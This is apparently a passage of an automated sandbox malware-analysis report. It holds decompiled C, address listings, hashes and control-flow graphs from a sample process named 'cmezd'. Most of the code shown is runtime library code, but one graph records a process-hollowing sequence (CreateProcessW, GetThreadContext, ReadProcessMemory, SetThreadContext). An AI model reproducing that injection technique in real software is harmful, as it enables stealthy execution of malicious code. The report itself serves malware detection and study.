									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L44;
									}
									_t198 = _v16;
									_t172 = ReadConsoleW(_v28, _v16, _t197 >> 1,  &_v24, 0);
									__eflags = _t172;
									if(_t172 != 0) {
										_t208 = _a12;
										_t231 = _t230 + _v24 * 2;
										goto L47;
									}
									_t160 = GetLastError();
									goto L39;
								} else {
									 *((intOrPtr*)(E013676C8())) = 0xc;
									 *(E01367721()) = 8;
									L40:
									_t231 = _t230 | 0xffffffff;
									__eflags = _t231;
									L41:
									E01364B6E(_t235);
									_t135 = _t231;
									goto L63;
								}
							}
						}
						__eflags = _t143 == 1;
						if(_t143 == 1) {
							_t191 =  !_t218;
							__eflags = 1 & _t191;
							if((1 & _t191) != 0) {
								_t155 = _v24;
								_t197 = _t218;
								_t220 = _a8;
								_v16 = _t220;
								goto L22;
							}
							goto L14;
						} else {
							_t197 = _t218;
							_t220 = _a8;
							_v16 = _t220;
							goto L23;
						}
					}
					L6:
					 *(E01367721()) =  *_t139 & 0x00000000;
					 *((intOrPtr*)(E013676C8())) = 0x16;
					goto L61;
				} else {
					 *(E01367721()) =  *_t192 & 0x00000000;
					_t134 = E013676C8();
					 *_t134 = 9;
					L62:
					_t135 = _t134 | 0xffffffff;
					L63:
					return _t135;
				}
			}
























































                                                                                              0x013810b3
                                                                                              0x013810b6
                                                                                              0x013810be
                                                                                              0x013810d8
                                                                                              0x013810da
                                                                                              0x0138142e
                                                                                              0x0138142e
                                                                                              0x01381433
                                                                                              0x01381433
                                                                                              0x0138143b
                                                                                              0x01381441
                                                                                              0x01381441
                                                                                              0x00000000
                                                                                              0x01381441
                                                                                              0x013810e0
                                                                                              0x013810e6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013810f0
                                                                                              0x013810f6
                                                                                              0x013810fb
                                                                                              0x013810ff
                                                                                              0x01381102
                                                                                              0x01381109
                                                                                              0x0138110c
                                                                                              0x0138110f
                                                                                              0x01381113
                                                                                              0x01381116
                                                                                              0x01381118
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138111e
                                                                                              0x01381121
                                                                                              0x01381127
                                                                                              0x01381141
                                                                                              0x01381143
                                                                                              0x0138142a
                                                                                              0x0138142a
                                                                                              0x00000000
                                                                                              0x0138142a
                                                                                              0x01381149
                                                                                              0x0138114d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01381153
                                                                                              0x01381157
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138115e
                                                                                              0x01381162
                                                                                              0x01381165
                                                                                              0x01381168
                                                                                              0x0138116d
                                                                                              0x0138116d
                                                                                              0x01381170
                                                                                              0x013811b7
                                                                                              0x013811b9
                                                                                              0x013811bb
                                                                                              0x0138118c
                                                                                              0x01381191
                                                                                              0x01381198
                                                                                              0x0138119e
                                                                                              0x00000000
                                                                                              0x013811bd
                                                                                              0x013811bf
                                                                                              0x013811c1
                                                                                              0x013811c2
                                                                                              0x013811c4
                                                                                              0x013811c6
                                                                                              0x013811c6
                                                                                              0x013811d0
                                                                                              0x013811d2
                                                                                              0x013811d9
                                                                                              0x013811de
                                                                                              0x013811e1
                                                                                              0x013811e4
                                                                                              0x013811e6
                                                                                              0x0138120c
                                                                                              0x01381214
                                                                                              0x01381217
                                                                                              0x0138121e
                                                                                              0x01381225
                                                                                              0x01381229
                                                                                              0x0138122b
                                                                                              0x01381232
                                                                                              0x01381232
                                                                                              0x01381235
                                                                                              0x01381235
                                                                                              0x01381238
                                                                                              0x0138123a
                                                                                              0x0138123d
                                                                                              0x01381240
                                                                                              0x01381245
                                                                                              0x01381248
                                                                                              0x01381251
                                                                                              0x01381251
                                                                                              0x01381255
                                                                                              0x01381258
                                                                                              0x0138125a
                                                                                              0x01381260
                                                                                              0x01381262
                                                                                              0x0138126b
                                                                                              0x0138126c
                                                                                              0x0138126e
                                                                                              0x01381272
                                                                                              0x01381273
                                                                                              0x01381277
                                                                                              0x01381281
                                                                                              0x01381286
                                                                                              0x01381289
                                                                                              0x01381298
                                                                                              0x01381298
                                                                                              0x0138129c
                                                                                              0x0138129f
                                                                                              0x013812a1
                                                                                              0x013812a3
                                                                                              0x013812a5
                                                                                              0x013812aa
                                                                                              0x013812ac
                                                                                              0x013812b0
                                                                                              0x013812b1
                                                                                              0x013812b7
                                                                                              0x013812c1
                                                                                              0x013812c2
                                                                                              0x013812c7
                                                                                              0x013812ca
                                                                                              0x013812d9
                                                                                              0x013812d9
                                                                                              0x013812dd
                                                                                              0x013812e0
                                                                                              0x013812e2
                                                                                              0x013812e4
                                                                                              0x013812e6
                                                                                              0x013812e8
                                                                                              0x013812ee
                                                                                              0x013812ee
                                                                                              0x013812ef
                                                                                              0x013812fe
                                                                                              0x013812ff
                                                                                              0x013812ff
                                                                                              0x013812e6
                                                                                              0x013812e2
                                                                                              0x013812ca
                                                                                              0x013812a5
                                                                                              0x013812a1
                                                                                              0x01381289
                                                                                              0x01381262
                                                                                              0x0138125a
                                                                                              0x01381305
                                                                                              0x0138130b
                                                                                              0x0138130d
                                                                                              0x0138137e
                                                                                              0x0138137e
                                                                                              0x01381382
                                                                                              0x01381389
                                                                                              0x01381390
                                                                                              0x01381396
                                                                                              0x01381398
                                                                                              0x013813f6
                                                                                              0x013813f6
                                                                                              0x013813fe
                                                                                              0x013813ff
                                                                                              0x01381401
                                                                                              0x0138141a
                                                                                              0x0138141d
                                                                                              0x0138135a
                                                                                              0x0138135b
                                                                                              0x00000000
                                                                                              0x01381360
                                                                                              0x01381423
                                                                                              0x00000000
                                                                                              0x01381423
                                                                                              0x01381408
                                                                                              0x01381413
                                                                                              0x00000000
                                                                                              0x01381413
                                                                                              0x0138139a
                                                                                              0x0138139d
                                                                                              0x013813a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013813a2
                                                                                              0x013813a2
                                                                                              0x013813a5
                                                                                              0x013813a8
                                                                                              0x013813ab
                                                                                              0x013813b2
                                                                                              0x013813b7
                                                                                              0x013813b9
                                                                                              0x013813bd
                                                                                              0x013813d8
                                                                                              0x013813dc
                                                                                              0x013813dd
                                                                                              0x013813e0
                                                                                              0x013813e3
                                                                                              0x013813ef
                                                                                              0x013813e5
                                                                                              0x013813e5
                                                                                              0x013813e5
                                                                                              0x013813bf
                                                                                              0x013813bf
                                                                                              0x013813bf
                                                                                              0x013813ca
                                                                                              0x013813cf
                                                                                              0x013813d2
                                                                                              0x013813d2
                                                                                              0x00000000
                                                                                              0x013813b7
                                                                                              0x01381312
                                                                                              0x01381315
                                                                                              0x0138131c
                                                                                              0x01381321
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138132a
                                                                                              0x01381330
                                                                                              0x01381332
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01381334
                                                                                              0x01381338
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01381343
                                                                                              0x0138134a
                                                                                              0x01381350
                                                                                              0x01381352
                                                                                              0x01381376
                                                                                              0x01381379
                                                                                              0x00000000
                                                                                              0x01381379
                                                                                              0x01381354
                                                                                              0x00000000
                                                                                              0x013811e8
                                                                                              0x013811ed
                                                                                              0x013811f8
                                                                                              0x01381361
                                                                                              0x01381361
                                                                                              0x01381361
                                                                                              0x01381364
                                                                                              0x01381365
                                                                                              0x0138136b
                                                                                              0x00000000
                                                                                              0x0138136d
                                                                                              0x013811e6
                                                                                              0x013811bb
                                                                                              0x01381172
                                                                                              0x01381175
                                                                                              0x01381186
                                                                                              0x01381188
                                                                                              0x0138118a
                                                                                              0x013811a8
                                                                                              0x013811ab
                                                                                              0x013811ad
                                                                                              0x013811b0
                                                                                              0x00000000
                                                                                              0x013811b0
                                                                                              0x00000000
                                                                                              0x01381177
                                                                                              0x01381177
                                                                                              0x01381179
                                                                                              0x0138117c
                                                                                              0x00000000
                                                                                              0x0138117c
                                                                                              0x01381175
                                                                                              0x01381129
                                                                                              0x0138112e
                                                                                              0x01381136
                                                                                              0x00000000
                                                                                              0x013810c0
                                                                                              0x013810c5
                                                                                              0x013810c8
                                                                                              0x013810cd
                                                                                              0x01381446
                                                                                              0x01381446
                                                                                              0x01381449
                                                                                              0x0138144c
                                                                                              0x0138144c

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0df59511d5e0629d55a73994ad3304d0edb3986a3573d598b2d27ea05bb27fcc
                                                                                              • Instruction ID: cdfb70d7dcf5d5343859703ec9933edd61a23e46dda7975b98535e0b3b0b975e
                                                                                              • Opcode Fuzzy Hash: 0df59511d5e0629d55a73994ad3304d0edb3986a3573d598b2d27ea05bb27fcc
                                                                                              • Instruction Fuzzy Hash: F2B12570E0034AAFDB11EF9DC880BADBFF9BF45308F548158E541AB691C7B09A42CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0095020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 231 95020a-950225 call 95005f 234 950228-95022c 231->234 235 950244-950251 234->235 236 95022e-950242 234->236 237 950254-950258 235->237 236->234 238 950270-95027d 237->238 239 95025a-95026e 237->239 240 950280-950284 238->240 239->237 241 950286-95029a 240->241 242 95029c-95037a call 950073 * 8 240->242 241->240 259 950391 242->259 260 95037c-950386 242->260 262 950395-9503b1 259->262 260->259 261 950388-95038f 260->261 261->262 264 9503b3-9503b5 262->264 265 9503ba 262->265 266 950734-950737 264->266 267 9503c1-9503e9 CreateProcessW 265->267 268 9503f0-950409 GetThreadContext 267->268 269 9503eb 267->269 271 950410-95042d ReadProcessMemory 268->271 272 95040b 268->272 270 9506e8-9506ec 269->270 275 950731-950733 270->275 276 9506ee-9506f2 270->276 273 950434-95043d 271->273 274 95042f 271->274 272->270 277 950464-950483 call 9511c8 273->277 278 95043f-95044e 273->278 274->270 275->266 279 950705-950709 276->279 280 9506f4-9506ff 276->280 293 950485 277->293 294 95048a-9504ab call 9512e2 277->294 278->277 281 950450-95045d call 951133 278->281 283 950711-950715 279->283 284 95070b 279->284 280->279 281->277 297 95045f 281->297 285 950717 283->285 286 95071d-950721 283->286 284->283 285->286 290 950723-950728 call 951133 286->290 291 95072d-95072f 286->291 290->291 291->266 293->270 299 9504f0-950510 call 9512e2 294->299 300 9504ad-9504b4 294->300 297->270 307 950517-95052c call 9500da 299->307 308 950512 299->308 301 9504b6-9504e2 call 9512e2 300->301 302 9504eb 300->302 309 9504e4 301->309 310 9504e9 301->310 302->270 313 950535-95053f 307->313 308->270 309->270 310->299 314 950571-950575 313->314 315 950541-95056f call 9500da 313->315 317 950655-950671 call 950f81 314->317 318 95057b-950589 314->318 315->313 325 950675-950696 SetThreadContext 317->325 326 950673 317->326 318->317 321 95058f-95059d 318->321 321->317 324 9505a3-9505c3 321->324 327 9505c6-9505ca 324->327 328 950698 325->328 329 95069a-9506a4 call 951082 325->329 326->270 327->317 330 9505d0-9505e5 327->330 328->270 336 9506a6 329->336 337 9506a8-9506ac 329->337 332 9505f7-9505fb 330->332 334 9505fd-950609 332->334 335 950638-950650 332->335 338 950636 334->338 339 95060b-950634 334->339 335->327 336->270 341 9506b4-9506b8 337->341 342 9506ae 337->342 338->332 339->338 343 9506c0-9506c4 341->343 344 9506ba 341->344 342->341 345 9506c6 343->345 346 9506cc-9506d0 343->346 344->343 345->346 347 9506d2-9506d7 call 951133 346->347 348 9506dc-9506e2 346->348 347->348 348->267 348->270
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D
                                                                                              • API String ID: 0-2746444292
                                                                                              • Opcode ID: 0b2ba315a7556c050564f3c068a2a8d27a24fbc26bfcb0b76fb8ee23c2824f87
                                                                                              • Instruction ID: 2108b57c4f75d467793d6a6e564e0b732d216fab3adb20699a68f7e06df17a31
                                                                                              • Opcode Fuzzy Hash: 0b2ba315a7556c050564f3c068a2a8d27a24fbc26bfcb0b76fb8ee23c2824f87
                                                                                              • Instruction Fuzzy Hash: 6B02F370D01208EFDB10CFA5C985BADBBB9BF84306F204159E915BA2A1D774AE98DF14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01382223 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 388 1382223-138223b call 136fdd7 391 138223d-1382244 388->391 392 1382251-1382267 SetFilePointerEx 388->392 393 138224b-138224f 391->393 394 1382269-138227a GetLastError call 13677e0 392->394 395 138227c-1382286 392->395 396 13822a2-13822a5 393->396 394->393 395->393 398 1382288-138229d 395->398 398->396
                                                                                              C-Code - Quality: 88%
                                                                                              			E01382223(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v12;
				void* _t19;
				int _t20;
				signed int _t23;
				intOrPtr _t26;
				signed int _t37;
				signed int _t38;
				signed int _t41;

				_t41 = _a4;
				_push(_t37);
				_t19 = E0136FDD7(_t41);
				_t38 = _t37 | 0xffffffff;
				if(_t19 != _t38) {
					_push(_a16);
					_t20 = SetFilePointerEx(_t19, _a8, _a12,  &_v12); // executed
					if(_t20 != 0) {
						if((_v12 & _v8) == _t38) {
							goto L2;
						} else {
							_t23 = _v12;
							_t44 = (_t41 & 0x0000003f) * 0x38;
							 *( *((intOrPtr*)(0x13a0da0 + (_t41 >> 6) * 4)) + _t44 + 0x28) =  *( *((intOrPtr*)(0x13a0da0 + (_t41 >> 6) * 4)) + 0x28 + (_t41 & 0x0000003f) * 0x38) & 0x000000fd;
						}
					} else {
						E013677E0(GetLastError(), _a20);
						goto L2;
					}
				} else {
					_t26 = _a20;
					 *((char*)(_t26 + 0x1c)) = 1;
					 *((intOrPtr*)(_t26 + 0x18)) = 9;
					L2:
					_t23 = _t38;
				}
				return _t23;
			}












                                                                                              0x0138222b
                                                                                              0x0138222e
                                                                                              0x01382230
                                                                                              0x01382235
                                                                                              0x0138223b
                                                                                              0x01382251
                                                                                              0x0138225f
                                                                                              0x01382267
                                                                                              0x01382286
                                                                                              0x00000000
                                                                                              0x01382288
                                                                                              0x01382288
                                                                                              0x01382293
                                                                                              0x0138229d
                                                                                              0x0138229d
                                                                                              0x01382269
                                                                                              0x01382273
                                                                                              0x00000000
                                                                                              0x01382279
                                                                                              0x0138223d
                                                                                              0x0138223d
                                                                                              0x01382240
                                                                                              0x01382244
                                                                                              0x0138224b
                                                                                              0x0138224b
                                                                                              0x0138224d
                                                                                              0x013822a5

                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(00000000,?,?,?,00000002,?,00000000,01365B50,01365B50,?,01381E95,?,?,?,00000002,00000000), ref: 0138225F
                                                                                              • GetLastError.KERNEL32(00000000,?,01381E95,?,?,?,00000002,00000000,?,01384779,?,00000000,00000000,00000002,?,?), ref: 0138226C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: f991439a296ce1d2e24e6e9055e1857a731ba8ff07a88e2c0eacf385f364aa7c
                                                                                              • Instruction ID: 30fd492273b5dc7b7836b180cf0bd902079fe880a573ed711daf44c65ca2da85
                                                                                              • Opcode Fuzzy Hash: f991439a296ce1d2e24e6e9055e1857a731ba8ff07a88e2c0eacf385f364aa7c
                                                                                              • Instruction Fuzzy Hash: 64012632610605AFCF059F6DDC45D9E3F2DEB95328F244208F8119B190E671E941CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135AD55 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 400 135ad55-135ad62 401 135ad64-135ad87 call 1364e5b 400->401 402 135ad8c-135ada0 call 1380f73 400->402 407 135aef3-135aef5 401->407 408 135ada5-135adae call 1381ea5 402->408 409 135ada2 402->409 411 135adb3-135adc2 408->411 409->408 412 135adc4 411->412 413 135add2-135addb 411->413 414 135ae9c-135aea1 412->414 415 135adca-135adcc 412->415 416 135addd-135adea 413->416 417 135adef-135ae23 413->417 421 135aef1-135aef2 414->421 415->413 415->414 418 135aeef 416->418 419 135ae25-135ae2f 417->419 420 135ae80-135ae8c 417->420 418->421 422 135ae56-135ae62 419->422 423 135ae31-135ae3d 419->423 424 135aea3-135aea6 420->424 425 135ae8e-135ae95 420->425 421->407 422->424 427 135ae64-135ae7e call 135a955 422->427 423->422 426 135ae3f-135ae51 call 135a9eb 423->426 428 135aea9-135aeb1 424->428 425->414 426->421 427->428 431 135aeb3-135aeb9 428->431 432 135aeed 428->432 433 135aed1-135aed5 431->433 434 135aebb-135aecf call 135ab96 431->434 432->418 438 135aed7-135aee5 call 13822b0 433->438 439 135aee8-135aeea 433->439 434->421 438->439 439->432
                                                                                              C-Code - Quality: 93%
                                                                                              			E0135AD55(signed int __edx, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				signed char _t73;
				signed int _t75;
				signed char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t93;
				signed int _t97;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr* _t105;
				signed char _t106;
				signed int _t107;
				signed int _t109;
				signed int _t112;
				signed int _t117;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;

				_t108 = __edx;
				if(_a4 != 0) {
					_t70 = E01380F73(_a4);
					_t102 = _a4;
					_t97 = _t70;
					__eflags =  *(_t102 + 8);
					if( *(_t102 + 8) < 0) {
						 *(_t102 + 8) = 0;
					}
					_t71 = E01381EA5(_t97, 0, 0, 1, _a8); // executed
					_t103 = _t108;
					_t122 = _t121 + 0x14;
					_v8 = _t103;
					_t117 = _t71;
					_v28 = _t117;
					__eflags = _t103;
					if(__eflags > 0) {
						L7:
						_t73 =  *(_a4 + 0xc);
						__eflags = _t73 & 0x000000c0;
						if((_t73 & 0x000000c0) != 0) {
							_t75 = _t97 >> 6;
							_t104 = (_t97 & 0x0000003f) * 0x38;
							_v16 = _t75;
							_v20 = _t104;
							_t105 = _a4;
							_v12 =  *((intOrPtr*)(_t104 +  *((intOrPtr*)(0x13a0da0 + _t75 * 4)) + 0x29));
							_t106 =  *(_t105 + 0xc);
							asm("cdq");
							_t99 =  *_t105 -  *((intOrPtr*)(_t105 + 4));
							_v24 = _t108;
							__eflags = _t106 & 0x00000003;
							if((_t106 & 0x00000003) == 0) {
								_t82 =  *(_a4 + 0xc) >> 2;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									L18:
									_t118 = _a4;
									_t103 = _v24;
									L19:
									_t109 = _v28;
									__eflags = _t109 | _v8;
									if((_t109 | _v8) == 0) {
										L25:
										_t85 = _t99;
										L26:
										goto L27;
									}
									_t86 =  *(_t118 + 0xc);
									__eflags = _t86 & 0x00000001;
									if((_t86 & 0x00000001) == 0) {
										__eflags = _v12 - 1;
										if(_v12 == 1) {
											_t87 = E013822B0(_t99, _t103, 2, 0);
											_t103 = _t109;
											_t99 = _t87;
											_t109 = _v28;
										}
										_t99 = _t99 + _t109;
										asm("adc ecx, [ebp-0x4]");
										goto L25;
									}
									_t85 = E0135AB96(_a4, _t109, _v8, _t99, _t103, _a8);
									goto L27;
								}
								_t71 = _a8;
								 *((char*)(_t71 + 0x1c)) = 1;
								 *((intOrPtr*)(_t71 + 0x18)) = 0x16;
								goto L17;
							}
							__eflags = _v12 - 1;
							_t107 = _v16;
							_t112 = _v20;
							if(_v12 != 1) {
								L13:
								_t88 =  *((intOrPtr*)(0x13a0da0 + _t107 * 4));
								__eflags =  *((char*)(_t112 + _t88 + 0x28));
								if( *((char*)(_t112 + _t88 + 0x28)) >= 0) {
									goto L18;
								}
								_t118 = _a4;
								_t89 = E0135A955( *((intOrPtr*)(_t118 + 4)),  *_t118, _v12);
								_t103 = _v24;
								_t122 = _t122 + 0xc;
								_t99 = _t99 + _t89;
								asm("adc ecx, edx");
								goto L19;
							}
							_t90 =  *((intOrPtr*)(0x13a0da0 + _t107 * 4));
							__eflags =  *(_t112 + _t90 + 0x2d) & 0x00000002;
							if(( *(_t112 + _t90 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t85 = E0135A9EB(0, _t117, _a4, _t117, _v8, _a8);
							goto L27;
						}
						asm("cdq");
						_t85 = _t117 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ecx, edx");
						goto L26;
					} else {
						if(__eflags < 0) {
							L17:
							_t85 = _t71 | 0xffffffff;
							L27:
							return _t85;
						}
						__eflags = _t117;
						if(_t117 < 0) {
							goto L17;
						}
						goto L7;
					}
				}
				_t93 = _a8;
				 *((char*)(_t93 + 0x1c)) = 1;
				 *((intOrPtr*)(_t93 + 0x18)) = 0x16;
				return E01364E5B(0, 0, 0, 0, 0, 0, _t93) | 0xffffffff;
			}






































                                                                                              0x0135ad55
                                                                                              0x0135ad62
                                                                                              0x0135ad90
                                                                                              0x0135ad96
                                                                                              0x0135ad9b
                                                                                              0x0135ad9d
                                                                                              0x0135ada0
                                                                                              0x0135ada2
                                                                                              0x0135ada2
                                                                                              0x0135adae
                                                                                              0x0135adb3
                                                                                              0x0135adb5
                                                                                              0x0135adb8
                                                                                              0x0135adbb
                                                                                              0x0135adbd
                                                                                              0x0135adc0
                                                                                              0x0135adc2
                                                                                              0x0135add2
                                                                                              0x0135add5
                                                                                              0x0135add9
                                                                                              0x0135addb
                                                                                              0x0135adf4
                                                                                              0x0135adf7
                                                                                              0x0135adfa
                                                                                              0x0135ae04
                                                                                              0x0135ae0b
                                                                                              0x0135ae0e
                                                                                              0x0135ae16
                                                                                              0x0135ae19
                                                                                              0x0135ae1a
                                                                                              0x0135ae1c
                                                                                              0x0135ae20
                                                                                              0x0135ae23
                                                                                              0x0135ae87
                                                                                              0x0135ae8a
                                                                                              0x0135ae8c
                                                                                              0x0135aea3
                                                                                              0x0135aea3
                                                                                              0x0135aea6
                                                                                              0x0135aea9
                                                                                              0x0135aea9
                                                                                              0x0135aeae
                                                                                              0x0135aeb1
                                                                                              0x0135aeed
                                                                                              0x0135aeed
                                                                                              0x0135aeef
                                                                                              0x00000000
                                                                                              0x0135aeef
                                                                                              0x0135aeb3
                                                                                              0x0135aeb7
                                                                                              0x0135aeb9
                                                                                              0x0135aed1
                                                                                              0x0135aed5
                                                                                              0x0135aedc
                                                                                              0x0135aee1
                                                                                              0x0135aee3
                                                                                              0x0135aee5
                                                                                              0x0135aee5
                                                                                              0x0135aee8
                                                                                              0x0135aeea
                                                                                              0x00000000
                                                                                              0x0135aeea
                                                                                              0x0135aec7
                                                                                              0x00000000
                                                                                              0x0135aecc
                                                                                              0x0135ae8e
                                                                                              0x0135ae91
                                                                                              0x0135ae95
                                                                                              0x00000000
                                                                                              0x0135ae95
                                                                                              0x0135ae25
                                                                                              0x0135ae29
                                                                                              0x0135ae2c
                                                                                              0x0135ae2f
                                                                                              0x0135ae56
                                                                                              0x0135ae56
                                                                                              0x0135ae5d
                                                                                              0x0135ae62
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ae64
                                                                                              0x0135ae6f
                                                                                              0x0135ae74
                                                                                              0x0135ae77
                                                                                              0x0135ae7a
                                                                                              0x0135ae7c
                                                                                              0x00000000
                                                                                              0x0135ae7c
                                                                                              0x0135ae31
                                                                                              0x0135ae38
                                                                                              0x0135ae3d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ae49
                                                                                              0x00000000
                                                                                              0x0135ae4e
                                                                                              0x0135ade3
                                                                                              0x0135ade6
                                                                                              0x0135ade8
                                                                                              0x00000000
                                                                                              0x0135adc4
                                                                                              0x0135adc4
                                                                                              0x0135ae9c
                                                                                              0x0135ae9c
                                                                                              0x0135aef1
                                                                                              0x00000000
                                                                                              0x0135aef2
                                                                                              0x0135adca
                                                                                              0x0135adcc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135adcc
                                                                                              0x0135adc2
                                                                                              0x0135ad64
                                                                                              0x0135ad6f
                                                                                              0x0135ad73
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ce2107aa11932b384adcb7498481dc0b91772524ea6601cda78d6d88834183a7
                                                                                              • Instruction ID: 80cd7795f641ccc203b70ad8fd12bec6f26ee13f1d728dbf01852c0946ca9bbd
                                                                                              • Opcode Fuzzy Hash: ce2107aa11932b384adcb7498481dc0b91772524ea6601cda78d6d88834183a7
                                                                                              • Instruction Fuzzy Hash: 4951C171A00208AFDB55DF5CC884EAD7FB5EF89768F148258FC495B252D3319E41EB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0138075A Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 443 138075a-13808f8 call 13809d8 447 13808fa-138090c call 1388e13 443->447 448 1380951-1380954 443->448 450 1380911-1380916 447->450 450->448 451 1380918-1380950 450->451
                                                                                              C-Code - Quality: 67%
                                                                                              			E0138075A(void* __ecx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v0;
				char _v12;
				void* _v20;
				intOrPtr _v24;
				char _v32;
				void* _t26;

				_pop(_t47);
				E013809D8(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L4:
					return 0;
				} else {
					_t26 = E01388E13( &_v12, _v0, _v24, _a8, 0x180); // executed
					if(_t26 != 0) {
						goto L4;
					} else {
						 *0x13a0ffc =  *0x13a0ffc + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a12 + 8)) = 0;
						 *((intOrPtr*)(_a12 + 0x1c)) = 0;
						 *((intOrPtr*)(_a12 + 4)) = 0;
						 *_a12 = 0;
						 *((intOrPtr*)(_a12 + 0x10)) = _v12;
						return _a12;
					}
				}
			}









                                                                                              0x0138075f
                                                                                              0x013808e3
                                                                                              0x013808ef
                                                                                              0x013808f0
                                                                                              0x013808f1
                                                                                              0x013808f8
                                                                                              0x01380951
                                                                                              0x01380954
                                                                                              0x013808fa
                                                                                              0x0138090c
                                                                                              0x01380916
                                                                                              0x00000000
